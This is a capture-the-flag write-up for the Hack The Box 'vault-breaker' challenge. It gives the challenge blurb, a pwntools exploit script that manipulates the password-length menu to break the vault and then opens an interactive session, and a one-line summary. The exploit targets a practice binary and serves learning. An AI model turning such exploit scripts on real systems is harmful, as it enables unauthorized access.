https://app.hackthebox.com/challenges/333

Description

Money maker, Big Boy Bonnie, has a crew of his own to do his dirty jobs. On a tiny little planet a few lightyears away, a custom-made vault has been found by his crew. Something is hidden inside it. Can you find out the way it works and bring it to Bonnie?

Exploitation

#!/usr/bin/python3
import sys

from pwn import *

context.binary = 'vault-breaker'

def get_process():
    # No argument: run the local binary. Otherwise connect to host:port.
    if len(sys.argv) == 1:
        return context.binary.process()
    host, port = sys.argv[1].split(':')
    return remote(host, int(port))

if __name__ == '__main__':
    p = get_process()
    # Menu option 1 prompts for a new password length (0-31).
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'[*] Length of new password (0-31): ', b'0')
    progress = log.progress('Number')
    # Repeat option 1 once for every length, from 31 down to 0.
    for i in range(31, -1, -1):
        progress.status(str(i))
        p.sendlineafter(b'> ', b'1')
        p.sendlineafter(b'[*] Length of new password (0-31): ', str(i).encode())
    # Select menu option 2, then hand the session over to the terminal.
    p.sendlineafter(b'> ', b'2')
    p.interactive()

Summary

Vault-breaker: the script calls menu option 1 once for every password length from 31 down to 0, then selects option 2 and switches to interactive mode to read the flag.